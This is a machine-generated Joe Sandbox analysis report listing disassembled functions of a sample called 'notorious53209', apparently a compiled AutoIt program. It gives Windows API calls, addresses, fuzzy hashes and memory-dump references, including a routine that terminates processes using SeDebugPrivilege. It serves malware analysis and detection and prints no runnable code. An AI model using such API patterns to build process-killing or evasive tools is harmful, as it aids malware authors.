                                            • Opcode ID: df247bb8c91fcff8c4ebb1be581428788efa6feab17eecbfb637e40e312bfb23
                                            • Instruction ID: 69ddc3f7ad22b98702e4701082253185ee5d331eb4ff8f284e9103e25fde1d4c
                                            • Opcode Fuzzy Hash: df247bb8c91fcff8c4ebb1be581428788efa6feab17eecbfb637e40e312bfb23
                                            • Instruction Fuzzy Hash: 6AE1B131224241DFCB54EF64C985B6ABBE1AF86314F14896DF8898B2A2CF74DC64CF51
                                            APIs
                                              • Part of subcall function 00231B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00231B9A
                                            • DestroyWindow.USER32(?), ref: 002320D3
                                            • KillTimer.USER32(-00000001,?), ref: 0023216E
                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0026BEF6
                                            • DeleteObject.GDI32(00000000), ref: 0026BF6C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                            • String ID:
                                            • API String ID: 2402799130-0
                                            • Opcode ID: c8a8de9d6a5d4898c7f95e7d64cafabbe0f7aad079572cb4faedb9fd0a0d263e
                                            • Instruction ID: e719d5453b956b13a2e15bb8d096bb7516d283280b1a9efad1ec42a56c907fb4
                                            • Opcode Fuzzy Hash: c8a8de9d6a5d4898c7f95e7d64cafabbe0f7aad079572cb4faedb9fd0a0d263e
                                            • Instruction Fuzzy Hash: 7E618D70120611DFDB2AAF14EE4CB35B7F1FB50356F10852DE58296971C771A8A9DF80
                                            APIs
                                              • Part of subcall function 002948AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002938D3,?), ref: 002948C7
                                              • Part of subcall function 002948AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002938D3,?), ref: 002948E0
                                              • Part of subcall function 00294CD3: GetFileAttributesW.KERNEL32(?,00293947), ref: 00294CD4
                                            • lstrcmpiW.KERNEL32(?,?), ref: 00294FE2
                                            • _wcscmp.LIBCMT ref: 00294FFC
                                            • MoveFileW.KERNEL32(?,?), ref: 00295017
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                            • String ID:
                                            • API String ID: 793581249-0
                                            • Opcode ID: 624dbcde33ec8e1fa19ba7efeac8c1c55a81e6dca90ccf5712b386eda086dde7
                                            • Instruction ID: 38117c1243c3e85b536baf021a4b88892f6f1d28be867e0a9c8da8f9a0bbac54
                                            • Opcode Fuzzy Hash: 624dbcde33ec8e1fa19ba7efeac8c1c55a81e6dca90ccf5712b386eda086dde7
                                            • Instruction Fuzzy Hash: A25174B21187859BCB25EF50DC819DFB3ECAF85341F00092EF589D3151EE74A19D8B66
                                            APIs
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 002B896E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: InvalidateRect
                                            • String ID:
                                            • API String ID: 634782764-0
                                            • Opcode ID: 71c0f04fa8088b28f20c45927add3325e8ef46942afd5cb76f15d565d42f3cc8
                                            • Instruction ID: 3107e518fe0e889e31225f9088621241ac442716c601fca803a23370e4ffc2b7
                                            • Opcode Fuzzy Hash: 71c0f04fa8088b28f20c45927add3325e8ef46942afd5cb76f15d565d42f3cc8
                                            • Instruction Fuzzy Hash: 27517530520209BFEF209F24DC89BE97B6DFF05390F604116F919E66A1DF71A9A0DB51
                                            APIs
                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0026C547
                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0026C569
                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0026C581
                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0026C59F
                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0026C5C0
                                            • DestroyCursor.USER32(00000000), ref: 0026C5CF
                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0026C5EC
                                            • DestroyCursor.USER32(?), ref: 0026C5FB
                                              • Part of subcall function 002BA71E: DeleteObject.GDI32(00000000), ref: 002BA757
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                            • String ID:
                                            • API String ID: 2975913752-0
                                            • Opcode ID: 69039d4369e56fc6c89f707ffe170712ea53c5eee63dc3329b2d50d33d5659e7
                                            • Instruction ID: 210ca09f8a7383f721a3ebbf6e3d619083e6a466b466001c0dcc94d2b41e2384
                                            • Opcode Fuzzy Hash: 69039d4369e56fc6c89f707ffe170712ea53c5eee63dc3329b2d50d33d5659e7
                                            • Instruction Fuzzy Hash: 41517EB0A20209EFDB20DF24DC49FBA77B5EB54754F204529F942A7290DB70EDA4DB50
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00288A84,00000B00,?,?), ref: 00288E0C
                                            • RtlAllocateHeap.NTDLL(00000000,?,00288A84), ref: 00288E13
                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00288A84,00000B00,?,?), ref: 00288E28
                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00288A84,00000B00,?,?), ref: 00288E30
                                            • DuplicateHandle.KERNEL32(00000000,?,00288A84,00000B00,?,?), ref: 00288E33
                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00288A84,00000B00,?,?), ref: 00288E43
                                            • GetCurrentProcess.KERNEL32(00288A84,00000000,?,00288A84,00000B00,?,?), ref: 00288E4B
                                            • DuplicateHandle.KERNEL32(00000000,?,00288A84,00000B00,?,?), ref: 00288E4E
                                            • CreateThread.KERNEL32(00000000,00000000,00288E74,00000000,00000000,00000000), ref: 00288E68
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                            • String ID:
                                            • API String ID: 1422014791-0
                                            • Opcode ID: fa507b0997be8ed2c2ba3040536a38b1dff66a8abc1cddd743d3991221a93e80
                                            • Instruction ID: ad8d9f2cf9fca08bba3e5f74c56be894746aacef606e4202780ead0a678355dc
                                            • Opcode Fuzzy Hash: fa507b0997be8ed2c2ba3040536a38b1dff66a8abc1cddd743d3991221a93e80
                                            • Instruction Fuzzy Hash: 8B01A8B5250308FFE650AFA9ED4DF6B3BACEB89711F404521FA09DB1A1CA7098008B20
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit$_memset
                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                            • API String ID: 2862541840-625585964
                                            • Opcode ID: eea848147e11ab01af3df153d5023ea59bd69c1ab7dd33ebdd931a10f77d95f6
                                            • Instruction ID: 759eb615bf68caa08ee64df472c9d6e65e55e7c98bdeaf2cf162b64f6796d187
                                            • Opcode Fuzzy Hash: eea848147e11ab01af3df153d5023ea59bd69c1ab7dd33ebdd931a10f77d95f6
                                            • Instruction Fuzzy Hash: 2B91CF70E20215ABDF24CFA6C848FAFB7B8EF46710F108159F505AB280DB709995CFA0
                                            APIs
                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002B7093
                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 002B70A7
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002B70C1
                                            • _wcscat.LIBCMT ref: 002B711C
                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 002B7133
                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002B7161
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window_wcscat
                                            • String ID: SysListView32
                                            • API String ID: 307300125-78025650
                                            • Opcode ID: ca5a484860a1b580d477ad9941d2dcf8862d3acc5161c29f88ee7396af24ad15
                                            • Instruction ID: 21dac2d74a38645b43ba0d45acb494cdb1ccae387576290ab89397e134260b47
                                            • Opcode Fuzzy Hash: ca5a484860a1b580d477ad9941d2dcf8862d3acc5161c29f88ee7396af24ad15
                                            • Instruction Fuzzy Hash: 7E41A571924309AFDB21DF64CC85BEEB7B8EF48390F10092AF954E7191D671AD948B60
                                            APIs
                                              • Part of subcall function 00293E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00293EB6
                                              • Part of subcall function 00293E91: Process32FirstW.KERNEL32(00000000,?), ref: 00293EC4
                                              • Part of subcall function 00293E91: CloseHandle.KERNEL32(00000000), ref: 00293F8E
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002AECB8
                                            • GetLastError.KERNEL32 ref: 002AECCB
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002AECFA
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 002AED77
                                            • GetLastError.KERNEL32(00000000), ref: 002AED82
                                            • CloseHandle.KERNEL32(00000000), ref: 002AEDB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                            • String ID: SeDebugPrivilege
                                            • API String ID: 2533919879-2896544425
                                            • Opcode ID: ece5277e45de2c61bb01f1d38780afba443e37a703bfc676127684ca246ac1d8
                                            • Instruction ID: c50607f05bbf8ae1e686ff250255cce242d591bcbb20e8768082401e957a6d55
                                            • Opcode Fuzzy Hash: ece5277e45de2c61bb01f1d38780afba443e37a703bfc676127684ca246ac1d8
                                            • Instruction Fuzzy Hash: 3F41E2702202019FDB14EF24CC99F6DB7A5AF81710F198459F9429F2D2DFB5A825CF91
                                            APIs
                                            • LoadIconW.USER32(00000000,00007F03), ref: 002932C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: IconLoad
                                            • String ID: blank$info$question$stop$warning
                                            • API String ID: 2457776203-404129466
                                            • Opcode ID: 0b48cc408c8855344019b1c96e1fe2d6f86a26c7df9efc735f9d0d402ea90275
                                            • Instruction ID: a484b4900a875207569351d4975a2696f13e2014c86df7dcaa181cad4468c7ad
                                            • Opcode Fuzzy Hash: 0b48cc408c8855344019b1c96e1fe2d6f86a26c7df9efc735f9d0d402ea90275
                                            • Instruction Fuzzy Hash: 5C110831A78387BAAF01DF55DC42C6BB39CDF1A3A0F10006AFD05A6181D6B16F6049A5
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0029454E
                                            • LoadStringW.USER32(00000000), ref: 00294555
                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0029456B
                                            • LoadStringW.USER32(00000000), ref: 00294572
                                            • _wprintf.LIBCMT ref: 00294598
                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002945B6
                                            Strings
                                            • %s (%d) : ==> %s: %s %s, xrefs: 00294593
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: HandleLoadModuleString$Message_wprintf
                                            • String ID: %s (%d) : ==> %s: %s %s
                                            • API String ID: 3648134473-3128320259
                                            • Opcode ID: 805058347286918ecc642af46758f93e094bad9d60813bd1e29dbd62ff95d5d3
                                            • Instruction ID: a6b293d4fd5c1ec75599bef3e54efa5455d9a6f262146570edc97b8dab8a2428
                                            • Opcode Fuzzy Hash: 805058347286918ecc642af46758f93e094bad9d60813bd1e29dbd62ff95d5d3
                                            • Instruction Fuzzy Hash: CD0167F2510208BFE751E7A4DE8DEF7776CD708301F4005A6BB49D2051E6745E958B74
                                            APIs
                                            • ShowWindow.USER32(FFFFFFFF,?), ref: 00232ACF
                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00232B17
                                            • ShowWindow.USER32(FFFFFFFF,00000006), ref: 0026C46A
                                            • ShowWindow.USER32(FFFFFFFF,?), ref: 0026C4D6
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ShowWindow
                                            • String ID:
                                            • API String ID: 1268545403-0
                                            • Opcode ID: a46508e392aff616eaf43db1132c66589a3c2d72186befa75b5b834392cbd3c6
                                            • Instruction ID: b7808617df8e9f9e74393e3b4a8a259b9734a18d0705d346a20dab9005843dc6
                                            • Opcode Fuzzy Hash: a46508e392aff616eaf43db1132c66589a3c2d72186befa75b5b834392cbd3c6
                                            • Instruction Fuzzy Hash: 42414AB0238781DBC735DF28DD9C77A7BE2AF45314F24881DE0C786560CAB5A8A9D710
                                            APIs
                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0029737F
                                              • Part of subcall function 00250FF6: std::exception::exception.LIBCMT ref: 0025102C
                                              • Part of subcall function 00250FF6: __CxxThrowException@8.LIBCMT ref: 00251041
                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002973B6
                                            • RtlEnterCriticalSection.NTDLL(?), ref: 002973D2
                                            • _memmove.LIBCMT ref: 00297420
                                            • _memmove.LIBCMT ref: 0029743D
                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0029744C
                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00297461
                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00297480
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                            • String ID:
                                            • API String ID: 256516436-0
                                            • Opcode ID: 2629e0971814aca7581a943d0e57924cd8c3f0e9d6ebc6825072e30a2b3868dd
                                            • Instruction ID: 4d821de58e789734c19819ca0d5d0212d468f214712a8af1b85ac34c324d80c6
                                            • Opcode Fuzzy Hash: 2629e0971814aca7581a943d0e57924cd8c3f0e9d6ebc6825072e30a2b3868dd
                                            • Instruction Fuzzy Hash: 2D319031914205EBDF10DF68DD89AAF7B78EF44711B1441B5FD04AB246DB309E64CBA4
                                            APIs
                                            • DeleteObject.GDI32(00000000), ref: 002B645A
                                            • GetDC.USER32(00000000), ref: 002B6462
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002B646D
                                            • ReleaseDC.USER32(00000000,00000000), ref: 002B6479
                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002B64B5
                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002B64C6
                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002B6500
                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002B6520
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                            • String ID:
                                            • API String ID: 3864802216-0
                                            • Opcode ID: 4d5f5987e6ee03e3776d8ef18dced0fc5bdbf1ae760352cadfe2eeefe748e53c
                                            • Instruction ID: b6dc45aa7795c01e90014f8bc416e860cacc0c73d07916deb71a415ba0cf4f7a
                                            • Opcode Fuzzy Hash: 4d5f5987e6ee03e3776d8ef18dced0fc5bdbf1ae760352cadfe2eeefe748e53c
                                            • Instruction Fuzzy Hash: 9D319C72210210BFEB218F10DD8AFEA3FADEF09761F040165FE089A2A5C6759C51CB60
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
